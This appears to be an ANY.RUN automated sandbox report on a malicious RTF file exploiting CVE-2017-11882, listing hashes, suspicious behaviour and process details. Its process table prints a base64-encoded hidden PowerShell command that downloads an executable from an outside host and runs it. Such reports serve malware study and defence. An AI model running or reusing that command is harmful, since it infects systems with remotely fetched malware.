analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PDFT8559590555.doc

Full analysis: https://app.any.run/tasks/74ccad0d-25b5-47f7-9b72-ab1f13733205
Verdict: Malicious activity
Analysis date: November 08, 2019, 14:54:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

EF7F56CA630F0612534EAA3CF388CDBA

SHA1:

5420F1F4D693A96E5FB26C30428ED3661F12D171

SHA256:

66800AFE021193F9309D890929652D06A05EA413E9E52AF6CD99EAED34BE4BAB

SSDEEP:

96:Vo8TNHFxeaqMesAwlAaNlHWDDkxxPWnv+G6SOuuYVsce28zik1lNxi2Srx0ElERV:VJRFcPMesdllHeIPk+rNeAJrCnlERUcd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3040)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 3040)
    • Reads internet explorer settings

      • EQNEDT32.EXE (PID: 3040)
    • Executes PowerShell scripts

      • EQNEDT32.EXE (PID: 3040)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2420)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2420)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2420"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PDFT8559590555.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3040"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2356"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -noni -W Hidden -e aQBlAHgAIAAoACgAbgBlAHcALQBPAGIASgBlAGMAVAAgAFMAeQBzAFQAZQBtAC4AbgBlAFQALgBXAGUAQgBDAGwASQBlAE4AdAApAC4AZABPAHcAbgBMAG8AQQBEAGYASQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwBvAHIAbABkAGkAeABhAG0ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAGwAdQBnAGkAbgBzAC8AZABpAHIALwBqAG8ALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGIAYQBrAGQAcgBhAHcALgBlAHgAZQAiACkAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYgBhAGsAZAByAGEAdwAuAGUAeABlACIAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
3221225794
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 667
Read events
992
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
2420WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA68B.tmp.cvr
MD5:
SHA256:
2420WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D3E45E9E34C71A48C10FD945E9620BAF
SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F
2420WINWORD.EXEC:\Users\admin\AppData\Local\Temp\1.atext
MD5:6EBD2C1A2AA5FBD9B94E2A4E25F86120
SHA256:3C014B918F71B67E7A32A2A216F45E66DE972F71AD89CCB98D7DDD7F8EB842BD
2420WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$FT8559590555.docpgc
MD5:790F4F679F4AE2773D27F3BC1F028CF3
SHA256:CFC4C7EEF3903AA2A16BB5CE166AC5CCE7D7526E64AE48A1451C720218C4A849
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info